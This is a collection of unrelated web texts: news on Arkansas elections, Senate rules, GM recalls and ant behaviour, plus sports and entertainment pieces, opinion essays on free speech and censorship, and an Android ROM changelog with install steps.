Former Massachusetts governor and 2012 GOP presidential nominee Mitt Romney is scheduled to campaign Aug. 20 for Hutchinson in Jonesboro.
Meanwhile, some of the other statewide candidates have personal ties to the area.
GOP Attorney General candidate Leslie Rutledge grew up in Batesville while Jacob Holloway, a Libertarian candidate for Secretary of State, grew up in Jonesboro.
ON THE BALLOT
With the exception of a controversial vote on veterans, the First District Congressional race has so far been fairly quiet.
Incumbent Republican Cong. Rick Crawford faces Democratic nominee Jackie McPherson, the current mayor of Heber Springs.
Crawford was first elected in the historic 2010 election cycle that brought Republican representation to the district for the first time since Reconstruction. He has been working the district with constituent services, but campaign rallies and political appearances have been limited.
McPherson, who is campaigning in parts of the district for the first time this year, has made appearances in Jonesboro and other parts of Northeast Arkansas. He faces the uphill battle of raising his profile and name identification against a two-term representative.
Libertarian Brian Scott Willhite is also vying for the Congressional seat.
A Talk Business & Politics-Hendrix College Poll released in late July showed Crawford with a comfortable 47.5%-33% lead over McPherson. Willhite garnered 3% of the vote and the remaining 16.5% were undecided.
All told, there are 12 state legislative races in Northeast Arkansas this fall, several that are considered highly competitive.
Four of the contested state house races this year are in Craighead County, with two other contested races in Greene, Independence and Poinsett counties each.
Contested State House races in the region include:
• District 51 (Crittenden) – Libertarian Rodger Paxton of Marion and Democratic incumbent Deborah Ferguson of West Memphis
• District 52 (Craighead, Independence, Jackson and Poinsett) – Republican Dwight Tosh and Democrat Radius Baker, both of Jonesboro.
• District 53 (Craighead) – Republican Dan Sullivan and Democratic incumbent Homer Lenderman of Brookland.
• District 54 (Mississippi and Poinsett) – Republican Dave Wallace of Leachville and Democratic incumbent Wes Wagner of Manila.
• District 57 (Greene) – Republican Ronnie Spence and Democratic incumbent Mary Broadaway, both of Paragould.
• District 58 (Craighead) – Republican Brandt Smith and Democratic incumbent Harold Copenhaver, both of Jonesboro.
• District 59 (Craighead) – Republican Jack Ladyman and Democrat Ron Carroll, both of Jonesboro.
• District 60 (Greene, Lawrence, Randolph and Sharp) – Republican Blaine Davis of Hoxie and Democratic incumbent James Ratliff of Imboden.
• District 61 (Fulton, Baxter, Randolph and Sharp) – Republican Doug Driesel of Cherokee Village and Democratic incumbent Scott Baltz of Pocahontas.
• District 62 (Izard, Independence, Sharp and Stone) – Republican Michelle Gray and Democratic incumbent Tommy Wren, both of Melbourne.
There are two contested State Senate races in Northeast Arkansas. They include:
• District 19 (Fulton, Independence, Izard, Randolph and Sharp) – Republican former State Rep. Linda Collins-Smith of Pocahontas and Democratic State Rep. James McLean of Batesville.
• District 20 (Clay, Craighead, Greene, Lawrence and Randolph) – Republican Blake Johnson of Corning and Democratic incumbent State Sen. Robert Thompson of Paragould.
Republicans currently hold a 51-48-1 margin in the State House and a 22-13 majority in the State Senate.
ADDITIONAL ANALYSIS
Talk Business & Politics bloggers Jason Tolbert and Michael Cook joined a political roundtable with host Roby Brock and KATV's lead capitol reporter Janelle Lilley to discuss the current state of Arkansas politics heading into Labor Day.
Noting recent Talk Business & Politics-Hendrix College survey data, Republicans have several advantages currently, noted Tolbert. Cook said there is plenty of time for the conditions to change and he expects to see movement in key demographics in the next few weeks.
Both Cook and Tolbert offered their opinions on predictions for the 2014 election season. Watch their full interview below from this week's edition of Talk Business & Politics, which airs Sundays at 9 a.m. on KATV Ch. 7.
Comments
comments
© Nickleodeon/
Round 14 remix of Franchise Remix. Click here to cast your vote for the next round. ---You guys really are excellent at selecting the franchises. Because this one ... so perfect. The designs came together so easily that I focused primarily on making the pose super dynamic - to the point that if I was actually daunted by it. I really wanted to make sure this one looked particularly awesome.I'll put a little Spoiler Warning here for the next paragraph, if you havent seen Korra Book 1.As well as Asami's gear, I included a few Equalist weapons since Future Industries provided them with all their tech. I figured she might utilize the same tech for justice.For the bat-designs, I mainly got inspiration from Arkham Knight - however I changed the bat-symbol just a bit, because it turned into the the Future Industries logo so perfectly.You may have noticed the delay on this round. For the past fortnight, I've been occupied with a big, urgent project - literally 24/7. *phew* So to make up for it, I wanted to give you all round 15 sooner. I'll be looking at the second highest votes from the round 14 polls, and posting that remix in a few days. Which means you can go ahead and start voting for round 16 right away.Hope you like it!---
Sen. Elizabeth Warren took to Facebook late Tuesday night to finish delivering her speech after being formally silenced on the Senate floor for quoting Coretta Scott King during her criticism of President Trump's nominee for attorney general.
The dramatic scene unfolded when the Massachusetts Democrat ran afoul of the chamber's arcane rules-- Rule XIX-- by reading a three-decade-old letter from Dr. Martin Luther King's widow that dated to Sen. Jeff Sessions' failed judicial nomination three decades ago.
King wrote that when acting as a federal prosecutor, Sessions used his power to ‘‘chill the free exercise of the vote by black citizens.''
Quoting King technically put Warren in violation of Senate rules for ‘‘impugning the motives'' of Sessions, though the letter was written about 10 years before Sessions was elected to the Senate.
Sen. Chuck Schumer, D-N.Y., called her formal silencing “totally unnecessary.” Sen. Orrin Hatch, R-Utah, said both sides “should be ashamed" about the atmosphere on the floor.
“This place is going to devolve into nothing but a jungle,” Hatch said.
Though silenced, Warren later posted on Twitter that, “I will not be silent about a nominee for AG who has made derogatory & racist comments that have no place in our justice system.”
Top Senate Republican Mitch McConnell invoked the rules. After a few parliamentary moves, the GOP-controlled Senate voted 49-to-43 to silence Warren.
Warren is now forbidden from speaking again on Sessions' nomination. A vote on Sessions is expected Wednesday evening. He is expected to be confirmed.
"She was warned. She was given an explanation. Nevertheless, she persisted," McConnell said. Her supporters later used #shepersisted as a rally cry.
A senator's mouthpiece is larger than the senate floor, but it's even larger when her constituents rally w/ @SenateDems to #LetLizSpeak — Chuck Schumer (@SenSchumer) February 8, 2017
Bernice King, the daughter of Coretta Scott King and Martin Luther King wrote on Twitter, “Thank you @SenWarren for being the soul of the Senate during the #Sessions hearing.”
The Democratic National Committee said it is a “sad day in America when the words of Martin Luther King Jr's widow are not allowed on the floor of the United States Senate.”
Warren went on to read the letter from King on Facebook, which attracted two million views, according to The New York Times, an audience likely far greater than she would have gained on C-SPAN. Supporters took to social media with the hashtag #LetLizSpeak and #ShePersisted as something as a rally cry.
Warren, 67, hasn't ruled out a future White House run but has said she is focused on the 2018 senate race.
According to an Associated Press review of Warren's latest campaign finance reports, the Massachusetts Democrat took in a hefty $5.9 million in campaign contributions from January 2015 through the end of 2016.
The Associated Press contributed to this report
“Fake cheques were presented by AVAM or whoever that person who has given them to AVAM,” said the donor.
A day after AAP Volunteer Adhikar Manch or AVAM, a splinter group of the AAP, alleged that the Arvind Kejriwal-led party received funds through “dubious” sources and produced copies of cheques issued to the party allegedly by one Jaskirat Kaur Mann, who came out to say that the two cheques were fake.
Advertising
Mann also gave a day's ultimatum to AVAM to retract its statement and apologise publicly, failing which she will take legal action against it. Mann comes from Moga district in Punjab and has been living in Canada.
The allegation that Mann is contesting is separate from the one levelled against the AAP by Avam this week, where the party is alleged to have received a total of Rs 2 crore from four “shell companies” based in Delhi.
[related-post]
Mann refuted AVAM's charges and maintained that no such cheques were given to her or were encashed by her for the purpose of making a donation to AAP. “An organisation called AVAM has levelled allegations that I received a donation on behalf of AAP of Canadian $1,000 (Rs 50,000) from a company named Gagan Blueberry Growers Ltd by producing a cheque. This is signed by one Jagman Deep Singh. This is absolutely false and no cheque has been given to me or has been encashed by me,” Mann told Newsline.
“I ask them to tender an unconditional apology within 24 hours, after which we will be taking appropriate legal action,” Mann said.
According to AVAM, Mann made donations to the AAP through two cheques in December. Dated December 15, 2014, the first cheque for Canadian $1,000 — drawn from Royal Bank of Canada — was purportedly issued from Gagan Blueberry Growers and was given to the AAP by Mann.
The second cheque for Canadian $500 — dated December 20, 2014 and also drawn on the same bank — was purportedly issued by Devinder Samra and allegedly given to the party by Mann.
Advertising
Mann said it is “apparent that these people are running a personal vendetta against AAP…I have my bank statement, but they did not bother to cross-check basic facts”.
That Katherine Cross' last post was “Why Punching Nazis Is Not Only Ethical, But Imperative” shouldn't put you off of reading what this sociologist, transfeminist, has to say about free speech. After all, who better to explain the Constitution?
Cross' post takes liberals to task for ruining free speech by supporting it as a principle rather than a weapon to be used for, and against, evil. Her opening paragraphs set a definite tone:
I see you there. Stop cringing. The problem for us is that impressionable people will not be put off by the obvious social justice dog whistles, the devolvement into tropes and logical fallacies, the flagrant mischaracterizations. Hold on to your brain cells, because this is a ride that needs to be taken to appreciate why people will take to the streets, engage in violence, all the while believing that they are the fighters for justice. They mean well, but this is the tripe they're fed. And they like it.
But suspend your knee-jerk screaming at the computer that Milo is the example of free speech, and the principle isn't defined by how much you hate him or what other things he did, or happened in the world, that have no relation to the concept whatsoever. Cross is on a roll.
We could even go more broadly and ask where these noble defenders of liberty — from eggs on Twitter to carefully manicured beards at The Guardian — were when it emerged that US Customs and Border Patrol were searching the phones of certain people of color to see if they had criticized Trump on social media?
So she doesn't grasp that this isn't a free speech issue at all. She's a sociologist, dammit. Not a lawyer.
A common refrain is this: A right to free speech is not a right to a platform. But this statement needs to be unpacked a bit more because it is often misunderstood.
Unpacked?
To speak to so vast an audience is a privilege, not a right. To speak through a newspaper or magazine column, a TV talk show, an interview on national TV, a speech at a university, or a primetime debate program, is, by its very nature, a privilege not open to all. *** The same applies to Yiannopoulos at Berkeley. What people are really arguing about is whether Yiannopoulos has a right to be paid to go on a speaking tour, complete with hotels, a bus (yes, really), and an entourage. That is a separate question from whether he has a right to hold his views; he could spread them, as so many do, from street corners and subway stations. He does not have a specific right to any particular rarefied rostrum, however.
He was invited to speak at Berkeley. He didn't force his way in at gunpoint. He was paid because someone chose to pay him. He has no right to demand the Berkeley soapbox. But he was invited to hop atop it, complete with hotels and a bus.
The larger issue is why liberals keep letting themselves get suckered into this argument again and again. It was already a pointless extravagance in years past, but in the age of Trump and his proto-fascist presidency, it is a fatal indulgence.
Here is where Cross draws the distinction between the liberal facilitators of evil and the evil itself.
One of the biggest problems with mainstream liberalism is its fetish for abstract principle over material reality. It is prone to forget that in a democracy, principles exist as a means to an end: the guarantee of maximal rights and liberties for the greatest number of people.
Cross assumes, as do most people, that whatever she believes is what the “greatest number of people” want and will benefit from, because reasons.
What liberalism's fetish for abstraction does, however, is leave it woefully unprepared for rights conflicts, which are inevitable in a complex society. At some point, one person's exercise of their rights will come into conflict with another person exercising theirs, and this dispute must be adjudicated upon. Someone's rights will be abridged as a result, which will be necessary to guaranteeing democracy's stated aims.
This is certainly true, but it leads her to this:
The right to free speech is essential; it is very, very far from abstract. Ask anyone who had their phone searched at a border crossing this past week. That scenario is the very reason we have a First Amendment: uniformed, armed officers of the state, searching the correspondence of a civilian to see whether they criticized the president, punishing them if offending material is found. More than anything our First Amendment exists to protect the rights of the ordinary person to criticize those in power without fear of reprisal from the state. Yet instead we debate the right of an already rich man to use his exalted platform to take away the speech rights of others.
Again with her border confusion, but that's only to get to the point that Free Speech is critically important when it's the Free Speech she deems good speech. Ah, to be the arbiter of good and evil in the universe. Not sure what the pay is, but the power would make it worth it.
Put aside logic and law. Put aside the conflation of Milo's body odor with Free Speech. This is where the disconnect happened:
[Liberals are] prone to forgetting that in a democracy, principles exist as a means to an end.
Or as the converse explains, progressives only care about principles to the extent they can be used to achieve their end. This is why Free Speech, not to mention the other rights protected by the Constitution, matter. They not only protect us against “proto-fascists” on the right, but on the left as well.
H/T Rick Horowitz
Tigers designated hitter Victor Martinez waits for his turn during batting practice on Sunday. (Photo: Robin Buckson, Detroit News)
Lakeland, Fla. – Victor Martinez and his family have moved into a sprawling cattle ranch, located between Lakeland and Orlando, upon which he oversees some 600 cattle, including 25 bulls.
It's a serious operation.
“You've got to look for something after baseball, right?” he said after putting in a full day's work on the back fields at TigerTown Sunday. “Baseball doesn't last forever.”
Martinez, 38, is doing all he can to make it last at least another two years, or to the end of his contract with the Tigers. And toward that end, he built an impressive weight room at his ranch, which, judging by his bulging biceps and triceps, he's put to good use.
“Yeah I've spent a little time there,” he said. “There's nothing to do at the ranch but work out and work the cows. I mean, I am trying, man. I'm getting old. I've got to do something. These young guys are hungry.”
Martinez hit 27 home runs last season and knocked in 86 runs, numbers that take on greater luster when you consider he played the last two and a half months with a small hernia. He had surgery in October and didn't begin his offseason program until December.
“For what I am used to, that's kind of late for me,” he said. “But it is what it is. I had to take care of that.”
Martinez has come to camp with a clean bill of health – no knee pain, no residual effects from the surgery – for the first time in three years and he is on course to be the designated hitter for Team Venezuela in the World Baseball Classic next month.
“Oh sure, 100 percent,” he said. “I'm ready to go. No rehab, no nothing. Just play baseball. It's been a while.”
CLOSE Tigers make the rounds with photographers during photo day at spring training. Robin Buckson / Detroit News
Martinez often winced and grabbed at his stomach when he ran last year, and he said there were many days when he struggled to just get out of bed. Yet, he never disclosed his hernia publicly during the season.
“I've never made any excuses in my career,” he said. “Never.”
It was tough at times to keep it quiet, though, especially when he heard the negative reaction of the fans when he couldn't run to first, or when he'd hit a ball off the wall and settle for a single. It was double-agony for him.
“I understand the fans have all the right to get frustrated,” he said. “But trust me, there was no one more frustrated than me. I was hitting the ball to the gap, to the wall, and barely getting to first base.
“I've never been a fast guy in my career, but I know I was better than what I showed at the end of the season. But people just didn't know.”
He stayed in the lineup for two reasons: one, there was minimal risk of doing further damage by playing as long as he could manage the pain; and two, it didn't impede his ability to swing the bat.
He did, though, consider going on the disabled list.
“I thought about it, but it's still a process,” he said. “You have to take six or seven weeks to recover, and we were in the middle of the season. I was still able to put up good at-bats. Again, trust me, there was nobody more frustrated than I was.”
All that is behind him now. He's not going to be stealing bases or getting many infield hits, but there is a good chance he will be standing on second base when he drives one into the gap. And to further highlight the point, he's been taking ground balls at first base so he can give Miguel Cabrera a few more days off his feet.
“If I can help the team somehow, I will do it,” he said. “I don't care. I just want to win.”
Twitter @cmccosky
Has any half-hour comedy in recent years had a better track record securing celebrity cameos than “30 Rock”?
Before it ended its seven-year run last month, the superbly produced show featured appearances by, among others, Oprah Winfrey, Jerry Seinfeld, Condoleezza Rice, James Franco and Jim Carrey. Yet at a panel with a group of writers from the show at the Paley Center for Media last night, Tina Fey, its creator and star, revealed that there was one that got away: Dr. Zizmor, the dermatologist whose ads are plastered all over the New York subway system. “Zizmor turned us down,” Ms. Fey said urgently, before offering up her imitation of his wife's imagined (and taken aback) reaction to the suggestion. “[She] was like, ‘He's a doctor.'”
Ms. Fey — who reflected on the show with Robert Carlock, who helped launch “30 Rock,” Colleen McGuinness, Josh Siegal and Dylan Morgan — answered questions cheerfully but without much sentiment. She took pride in the writers' accomplishments and generally played down any talk of grand visions, explaining that the manic energy of the show might have come from anxiety that it was going to be canceled. When asked by the moderator, Emily Nussbaum, the television critic for The New Yorker, if there was any benefit that came from being on a broadcast network rather than on cable, she said that not being able to curse was a helpful constraint.
Some of the most interesting avenues of discussion were about what didn't receive a positive response. Ms. Fey said the audience didn't like it when the show introduced love interests for Jack Donaghy, played by Alec Baldwin. And a plot line involving an affair between Pete (played by Scott Adsit) and Jenna (Jane Krakowski) was dropped after a table read. “It tanked,” she said. “People were creeped out by it.”
After an hour or so, the audience was invited to ask questions. One young female comedian asked for advice. Ms. Fey said stage time in front of an audience is essential, then added, ”Always wear a bra, even if you think you don't need it.”
Krakauer , director of the BLAM Lab at Johns Hopkins University, and his team of researchers, artists, and programmers, is developing a new way of thinking about post-stroke therapies. By combining the human hand-eye coordination of video games and the playfulness of dolphins, Krakauer is hoping to change the way we think about—and treat— stroke patients.
Read more about the game and its design here. Sept. 29, 2014 - John, director of the BLAM Lab at Johns Hopkins University, and his team of researchers, artists, and programmers, is developing a new way of thinking about post-stroke therapies. By combining the human hand-eye coordination of video games and the playfulness of dolphins,is hoping to change the way we think about—and treat— stroke patients.
John Krakauer
Professor of Neurology and Neuroscience - Johns Hopkins University School of Medicine
It's not always that easy to recognize at the time that something is really now. Maybe one way you can diagnose it at the time is people's immense resistance to it. If somebodies objecting vociferously, you're on to something.
My name is John Krakauer, I'm a professor of neurology and neuroscience at Johns Hopkins University school of medicine.
Lots of argument, lots of discussion, open-mindedness and curiosity in unexpected places, I think that leads to bringing together domains that don't usually come together. In other words gaming, and art, and neuroscience.
I think our approach to stroke treatment therapy is innovative. And I hope that doesn't sound immodest, but I really don't think any one has got this kind of team trying this kind of treatment
Omar Ahmad
Chief Creative Engineer and Director - Kata Progrect
So the dolphin game came about as a solution to a need that dr. Krakauer had. Which is he wanted to be able to motorically connect a a patient to a creature that was different from a human. And what we had to do was create a simulation of an animal and in this case we chose a dolphin
It's this beautiful simulation of a creature that has its own bones its own muscles, it moves, it swims in its own environment and a user is jacked into it. That's really the essence of it and from that we can use it for a variety of things.
John Krakauer
So the most common disability after stroke is hemiparesis. It's when you lose motor control and strength on one side of your body. The other common symptoms are lost of speech and language, lose of sensation and loss of vision.
Most recovery in humans is happening early, in the first lets say month. We're trying to exploit plasticity so that they repair that loss of motor control and strength. Not learn to live with it, with what they have left, but to reverse it.
We had to create some kind of motivating, enriching environment to make people go back to childhood and explore in a non task based way what their limbs are capable of doing.
When you move most people think you move just to achieve something else. It's a means to an end. You move in order to pick up a glass, you move in order to get from A to B. But movement itself, the actual act of movement is enjoyable. We like putting our arm out the window of a car and feeling the wind blowing against it. We like even sitting on a train and thinking as it moves. We enjoy movement . We enjoy watching movement.
The game is the idea that one can develop an emotional connection to another organism, in this case animals, through the way it moves and then that reflects back to appreciating how oneself moves. And that there is a way that we live and exist through movement and that it needs to be captured through play and through science. And that''s what we've done.
Ever felt like your banana was just too… healthy? Yeah, we thought so. So now that you've been having bananas stuffed with banana all your life, we'd like to open your eyes and turn your attention to the DestapaBanana. It appears to be a tool for boring a hole in a banana. You're then free to fill that hole with other things that may not be quite as banana-y, like caramel, Nutella, Pop Rocks, peanuts… the sky is the limit.
To be honest, we're not really sure this is a real product. The pictures look like a computer rendering, and we can't seem to find where you can buy it. But we could be wrong, since this does seem like something that would be very popular among a certain demographic.
[ Product Page ] VIA [ Geek.com ]
For owners of GM's most popular pickups, recalls have been almost a monthly occurrence this year.
The 2014 Chevrolet Silverado and the GMC Sierra have been recalled six times so far in 2014, giving them the dubious honor of being the year's most frequently recalled vehicles.
And it doesn't stop there - the two trucks have been recalled nine times since they hit showrooms 12 months ago.
The Silverado and the Sierra are nearly identical - they share the same frame and many of the same parts and design features. GMC's Sierra is essentially a high-end, higher-priced version of the mass-market Silverado.
They may need lots of repairs, but don't call them lemons.
The Silverado won Truck of the Year honors from the nation's leading auto critics at the Detroit auto show in January.
And buyers love them too. The Silverado is GM's best-selling vehicle in the U.S., and the Sierra is the best-selling GMC model.
Related: GM's new Silverado and Sierra
GM (GM)said the recalls are sign of its commitment to safety. The automaker has been at the center of a massive controversy after it recalled 2.6 million cars for an ignition switch flaw ten years after it first knew of the problem.
"We are doing our best to minimize inconvenience to owners of recalled vehicles," said spokesman Alan Adler. "But our customers' safety comes first. If we identify an issue -- large or small -- that might affect the safety of our customers, we will act decisively."
GM could not say how many trucks were subject to all six recalls, but there were probably very few, since two of the recalls in question are tiny. In May, 477 trucks were recalled for a steering problem, and 184 trucks were recalled in June for unsecured floor mats.
But just because a recall is small doesn't mean it isn't serious. The steering problem flagged in May was so serious that GM called owners, sent overnight letters and used the OnStar in-vehicle communication system to warn them to stop driving the pickups immediately. GM sent flatbed trucks to take the vehicles in for repairs.
Other recalls for the Silverado and Sierra, as well as other GM vehicles, include:
559,000 vehicles with an oil cooler line that was not secure.
467,000 trucks that could shift into neutral unexpectedly.
378,000 trucks with exhaust components that could overheat.
70,000 vehicles with warning chimes that failed to alert divers when a door was open.
Related: Here's what's so outrageous about the GM debacle
Plenty of other vehicles have been recalled multiple times this year, as automakers speed up the recall process.
A CNNMoney analysis of federal safety regulator data shows that more than a dozen other models from Ford Motor (F), Fiat Chrysler Automobiles, Nissan (NSANF) and Toyota Motor (TM) have been subject to three or more recalls so far this year.
-- CNNMoney's Gregory Walllace contributed to this report
Ants and bees have reputations as efficient team players. In Temnothorax rugatulus—a small brown ant found in pine forests in North America—division of labor is common, with workers specializing in tasks like foraging, building, and brood care. But new research shows that many ants in a colony seem to specialize in doing nothing at all. To get a closer look at how these ants filled their time, researchers marked every member of five lab-based colonies with dots of colored paint. Over the course of 2 weeks, a high-definition camera recorded 5-minute segments of the ants in action six times a day, capturing their behavior (or lack thereof). Out of the “workers,” 71.9% were inactive at least half the time, and 25.1% were never seen working. A small fraction of the ants, just 2.6%, were always active during observation, the researchers wrote last month in Behavioral Ecology and Sociobiology. Previous studies have postulated that inactivity might be temporary, with ants working in shifts dictated by circadian rhythm. But the new results show that the lazy workers stay lazy no matter the time of day. According to the team, this suggests that inactivity isn't merely a break between tasks, but might be an important part of the ants' division of labor. Just what part remains unclear, but one theory is that the inactive ants are either too young or too old to work. Future studies over longer periods of time could capture the ants switching between busy and lazy modes.
updated:
The animal crafting texture pack lets players create realistic pets to increase their worth in the game. There is no need for users to settle for the regular looking animals of the past thanks to the added texture pack. They can add hair colors and even movement to any animal's look.
This is a must-have for people who like to own pets within the game. Of course, it is not a must-have, but it is a nice bonus for those who like to make things as realistic as possible.
Create New Looks for Your Pets on Minecraft
The animal crafting texture pack for minecraft is easy to download and use. The pack is easily melded and able to correspond with other modifications. Just take a look at the things this pack can do if you want more information and visuals. You will be able to see how the animals actually look with their new textures and colors. The best thing this pack can do is also help players disguise their most valued animals. If an attack is eminent, then players can change how their beloved animals look to the attacker. This will allow them to play with caution knowing their home base is somewhat more protected thanks to the animal crafting texture pack from Minecraft.
Downloads for Animal Crafting Texture Pack 1.6.2
Download Animal Crafting Texture Pack for Minecraft 1.6.2
DISCLAIMER
: This is a CUSTOM' ROM! Use at YOUR OWN RISK!!! By using this ROM, you understand that that I am not liable for any or all consequences of using this ROM. If you don't know what you're doing, DON'T TRY IT. Use at your own risk!
cyanogen - For starting this thing and keeping it going!!!
CyanogenMod - Do I need to state why we owe thanks to these guys?
koush - for his wonderful recovery.
dhacker29 - for all he did behind the scenes to get CM11 on the GNexus!!
@SlimRom - for their tuna device and vendor repos.
Guys on freenode #cyanogenmod-dev, #koush, & #oudhitsquad for their assistance and advice.
@Suxsem - for code fixes.
@AbhishekS - for helping with code fixes.
Everything it seems
google restore is not working - think its a Google issue
camera panorama, needs the 1205 gapps I posted to work, still no preview while taking shoots tho.
graphic glitch (during screenshot animation, taken image is fine though!!!)
Minor bug in viewing images in the camera app then tapping the gallery icon in the top left corner deleting the viewed image .
11.13.2013
Initial Build
11.15.2013
resynced with cm repos
added torch back
merged SlimRoms device tuna with CMs
11.17.2013
Using all CM Repos
sync's with CM Repos
Gmail/G Search FC's fixed
11.18.2013
11.19.2013
Synced with CM repos
11.20.2013
Synced with CM repos
cherry-picked gpu: Refactor GpuMemoryBuffer framework for multi-process support from gerrit. Fixes webview glitches.
11.22.2013
Synced with CM Repos
Quick Launch & Tiles merged (CM)
Various other backend changes merged (CM)
11.23.2013
Sync with CM Repos
The Return of Cid!!!!!!!!!!!!!!!!
11.24.2013
Synced with CM Repos
Cherry-picked pending merges for CMWallpapers
Cherry-picked pending merges for Dialer... yes 4.4 icons.
11.25.2013
Synced with CM Repos
Cherry-picked fixes for rotation glitch
Enabled modules in the kernel (was only missing one of the 3 settings)
11.26.2013
Sync'd with CM Repos
11.30.2013
Synced with CM Repos.
applied patch to fix screenrecord (submitted to gerrit also).
applied another flag for the gfx glitches, hopefully improves the lag some experience.
Toroplus Only - applied Sprint test APNs to fix data issues (also submitted to gerrit). 12.03.2013
Synced with CM Repos
Battery mods, Power Menu, & Extended Desktop merged (CM)
12.05.2013
Synced with CM Repos
12.06.2013
Synced with CM Repos
Fixed GoogleBackup - Reverted merge from AOSP. - issues is/was with gapps (yes most of the packages out have old/bad core files)
12.07.2013
- issues is/was with gapps (yes most of the packages out have old/bad core files) Synced with CM Repos (4.4.1)
12.09.2013
synced with CM Repos
Applied a improper fix for the screenshot glitch (Will be done properly in due time. )
12.10.2013
synced with CM Repos
Applied a fix for the screenshot glitch (submitted to gerrit) - actual code fixes thanks to Suxsem & AbhishekS
12.12.2013
Synced with CM Repos (4.4.2)
12.14.2013
Synced with CM Repos
12.15.2013
Synced with CM Repos
12.18.2013
Synced with CM Repos
cherry-picked patches for youtube playback & panorama on stock camera
12.23.2013
Synced with CM Repos
cherry-picked patch panorama
12.24.2013
Synced with CM Repos
Reverted Camera src to working state for tuna
Applied panorama patch
12.27.2013
Synced with CM Repos
cherry-picked camera fix
01.08.2014
Synced with CM Repos
cherry-picked proposed Dialer appearance changes
10.12.1014
Synced with CM Repos
cherry-picked patches for Allow changing screen-off animation
cherry-licked patched for InCallUI delay
NOTE: Need to be on the latest version of CWM or TWRP Recovery.
Download the .zip & copy to phone (make sure wifi is enabled if dl'd from phone). Zip can be installed from either sdcard or with sideload (No need to copy zip to phone if using sideload, see instructions for sideload below). MAKE A BACKUP!!! DO A FACTORY RESET!!! - this will wipe data & cache! Go to install zip from sdcard Choose zip from sdcard Select cm-11-xxxxxxxxxx-UNOFFICIAL-maguro.zip Confirm Repeat Steps 5 -8 for gapps Reboot
Download zip on PC Connect to PC via USB (make sure to have USB drivers if using Windows) Open a terminal or cmd window and type:
Code: adb sideload cm-11-xxxxxxxx-UNOFFICIAL-maguro.zip Repeat for Gapps. Reboot
XDA:DevDB Information
[ROM] [UNOFFICIAL] CyanogenMod 11 for the Samsung Galaxy Nexus, a ROM for the Samsung Galaxy Nexus
Contributors
Version Information
Here ya go folks, CyanogenMod 11 for the Galaxy Nexus (maguro)!!! Well, let's be honest, unless you're living under a rock, you probably know what Android 4.4 (kitkat) is. Furthermore, you should know what the CyanogenMod project is. However, if a rock is really your home and you'd like to learn more, please visit their site: CyanogenMod | Android Community Rom based on KitKat : 20140110: PlayfulGod: CyanogenMod 11 for Samsung Galaxy Nexus: Everything from CM Repos now.: StableCyanogenMod 11This is a build of the popular CyanogenMod 11 for the Samsung Galaxy Nexus. This is built from source.If using sideload:- Also can be installed via the cmupdater in Settings > CyanogenMod updates.Latest CWMR or TWRP installedCyanogenModStable011220142014-01-12121720132013-11-172013-11-212014-01-12
Bell Canada, one of Canada's major ISPs, is requesting the Canadian government to create a governmental censorship regime, blacklisting resources that Canadians shall not be reading. According to Bell Canada, this is necessary to “prevent people from leaving regulated television and turning to piracy instead”. It is not explained how leaving the regulated TV system, or forcing new services onto the market by turning to unlicensed distribution, is a bad thing in itself.
Bell Canada, one of Canada's major ISPs, is outright requesting the Canadian government to give them a blacklist of resources that its citizens shall not be allowed to read — a textbook example of governmental censorship. It is doing this in the “fight against piracy”, without realizing that the so-called cure may be many times worse than the problem.
Several ISPs have come under fire by the copyright industry in the past decade for not voluntarily preventing access to sites that allow people to manufacture their own copies of music, movies, and games outside of the licensed distribution channels, sites such as The Pirate Bay. Even though such constant barrage is a bother to ISPs, it is fundamentally of little difference from people who are annoyed by politics they don't agree with, and react with trying to de-platform their opponents instead of improving their own message, just like the copyright industry appears hellbent on preventing the present time from occurring instead of offering a service people want to buy.
In this, it is understandable if a company tries to take an easy way out and ask the government for some sort of authoritarian list of what's allowed and what isn't, essentially in an attempt to get the copyright industry to stop bothering them. But understandable in this context should not be confused with excusable, for two reasons:
First, censorship is never the answer to anything, and in particular not to people manufacturing their own copies, because it is overreaching, ineffective, and counterproductive; and second, because we know the copyright industry will never stop asking for more: they discovered in 1905 that throwing constant tantrums simply works, and have done so ever since. (In 1905, the tantrum was against the self-playing piano, which was supposed to be “an end to a vivid, songful humanity”.)
In particular, it is quite noteworthy that Bell Canada is asking for censorship to prevent people leaving scheduled television programming:
“People are actually leaving the regulated [TV] system, not just because they want to watch Netflix but because they want to watch free content,” Rob Malcolmson, Bell's senior VP of regulatory affairs, told federal politicians last week. He was speaking at a government hearing in Ottawa on NAFTA negotiations. — Canadian Broadcasting Corporation
In summary, this is wrong on basically every conceivable level.
It is utterly horrifying to see an Internet Service Provider, which is supposed to be the last line of defense for free speech and information, actually outright demanding governmental censorship — and this for something as fickle as people having grown tired of scheduled television programming once they discover they don't need to watch passive entertainment on somebody else's schedule anymore.
Privacy remains your own responsibility — as does your Freedoms of Speech and Information, in the face of events like these.
I'll tell you an interesting story about André. He couldn't ﬁt on a schoolbus on the way to school. He told me this. So he had to be driven, in a car, to school every morning. And his parents couldn't afford one. But his neighbor had a big car. And his neighbor used to drive him to school every day. And I said, “Oh, really?” He said, “Oh yes, he was a very nice man.” I said, well, “Really.” He said, “Yes, yes. You may have heard of him, I don't know.” I said, “Really? What's his name?” He goes, “Samuel Beckett.”
Transcribed from actor Cary Elwes's commentary on the “Princess Bride” dvd. Footnotes by Mike Benedetti. Beckett stencils by Ben Cummings.
Notes:
1. André Roussimoff, as “André the Giant,” was one of the greatest and most beloved professional wrestlers of all time. He had gigantism, and was claimed to be 7 ft 4 in, 540 lbs.
2. The Roussimoff family farm was in Molien, a village  miles from Paris. André attended school at nearby Ussy-sur-Marne until around 1957, when he dropped out to work on the farm.
3. Irish writer Samuel Beckett was part of the French Resistance against the Nazis and won the Nobel Prize for Literature in 1969. He is best known for his play “Waiting for Godot.” According to his friend James Knowlson, in 1953 Beckett took some money from an inheritance and built a house near Molien, which he used as a retreat for the rest of his life.
4. Princess Bride. Great movie. Cary Elwes was the pirate, André was the giant.
Tweeter @beidaijin has shared the following propaganda directive, also posted to CDT Chinese:
#Ban All media are to promptly find and delete content related to the “Communist Party Central Committee Propaganda Department Office of Socialist Core Value Propaganda and Education.” (May 6, 2016) [Chinese]
The patriotic girl group 56 Flowers arrived on the scene last summer, aspiring to be a less cute version of the Japanese group AKB48. They have succeeded in shedding all cuteness after their performance in the Great Hall of the People on Monday night, co-hosted by an imaginary government office. The China National Opera and Dance Drama Theater issued a statement today, currently posted prominently on their website homepage:
